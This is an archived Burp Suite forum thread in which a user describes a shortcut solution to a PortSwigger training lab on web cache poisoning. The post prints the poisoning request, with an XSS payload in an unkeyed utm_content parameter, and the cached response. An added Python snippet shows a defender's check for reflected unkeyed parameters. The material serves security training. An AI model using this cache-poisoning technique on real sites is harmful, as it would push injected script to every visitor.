The Burp Suite User Forum was discontinued on the 1st November 2024.

Burp Suite User Forum


Hi, I think that I found a flaw.

aadda | Last updated: Jan 28, 2021 08:46PM UTC

Hi, I think that I found a flaw on the https://portswigger.net/web-security/web-cache-poisoning/exploiting-implementation-flaws/lab-web-cache-poisoning-cache-key-injection lab. You can solve the lab just by adding Pragma: x-get-cache-key and issuing a request to this endpoint:

-------------
GET /login?lang=en&utm_content=t'><svg/onload=alert(1)+x=' HTTP/1.1
Pragma: x-get-cache-key
ext............
--------------------

You will get a response like:

----------------------
HTTP/1.1 302 Found
Location: /login/?lang=en&utm_content=t'><svg/onload=alert(1)+x='
Vary: Origin
Connection: close
Cache-Control: max-age=35
Age: 1
X-Cache-Key: /login?lang=en$$
X-Cache: hit
X-XSS-Protection: 0
Content-Length: 0
--------------------

Notice the X-Cache-Key: it means anyone who visits the home page will be redirected to /login/?lang=en&utm_content=t'><svg/onload=alert(1)+x=', in which the [utm_content] parameter is unkeyed and will be reflected into the head tag in the HTML, and the XSS will execute.

[<link rel="canonical" href='//ace51f121f0a8ff3808125b800b800b0.web-security-academy.net/login/?lang=en&utm_content=t'><svg/onload=alert(1) x=''/>]

I just want to send this because it is easier than the solution in the lab.
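The condition described in the post above (a parameter left out of the cache key but echoed in the cached response) can be checked from the defender's side. The following is an added example, not part of the original post or PortSwigger's lab code. It assumes the key is path plus keyed query plus `$$`, as in the quoted X-Cache-Key header, and uses a constructed harmless canary value; all function names are hypothetical.

```python
from urllib.parse import urlsplit, parse_qsl, urlencode

# Assumption: the cache drops these parameters from the key, as utm_content
# is dropped in the X-Cache-Key header quoted in the post.
UNKEYED_PARAMS = {"utm_content"}


def cache_key(target: str) -> str:
    """Model of the key shown in the post: path + keyed query + '$$'."""
    parts = urlsplit(target)
    keyed = [(k, v) for k, v in parse_qsl(parts.query, keep_blank_values=True)
             if k not in UNKEYED_PARAMS]
    query = urlencode(keyed)
    return parts.path + ("?" + query if query else "") + "$$"


def unkeyed_reflections(target: str, headers: dict, body: str = "") -> list:
    """Names of unkeyed parameters whose value is echoed in the response."""
    parts = urlsplit(target)
    haystack = "\n".join(list(headers.values()) + [body])
    return [k for k, v in parse_qsl(parts.query, keep_blank_values=True)
            if k in UNKEYED_PARAMS and v and v in haystack]


def safe_to_cache(target: str, headers: dict, body: str = "") -> bool:
    """A response that reflects unkeyed input must not be stored, because
    every later request mapping to the same key would receive it."""
    return not unkeyed_reflections(target, headers, body)


# Constructed sample: same shape as the exchange in the post, with a canary.
REQ = "/login?lang=en&utm_content=canary-7f3a"
RESP_HEADERS = {
    "Location": "/login/?lang=en&utm_content=canary-7f3a",
    "Cache-Control": "max-age=35",
}

if __name__ == "__main__":
    print("key with canary   :", cache_key(REQ))
    print("key without canary:", cache_key("/login?lang=en"))
    print("reflected unkeyed :", unkeyed_reflections(REQ, RESP_HEADERS))
    print("safe to cache     :", safe_to_cache(REQ, RESP_HEADERS))
```

Both requests map to the same key, so the mitigation is either to include the parameter in the key or to refuse to cache any response that reflects it.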

Hannah, PortSwigger Agent | Last updated: Feb 01, 2021 12:50PM UTC

Hi, could you send a video of this to support@portswigger.net so we can verify the solution? Cheers!

nil0x42 | Last updated: Feb 01, 2021 02:38PM UTC

Hi! I solved the challenge the same way...

Hannah, PortSwigger Agent | Last updated: Feb 02, 2021 12:58PM UTC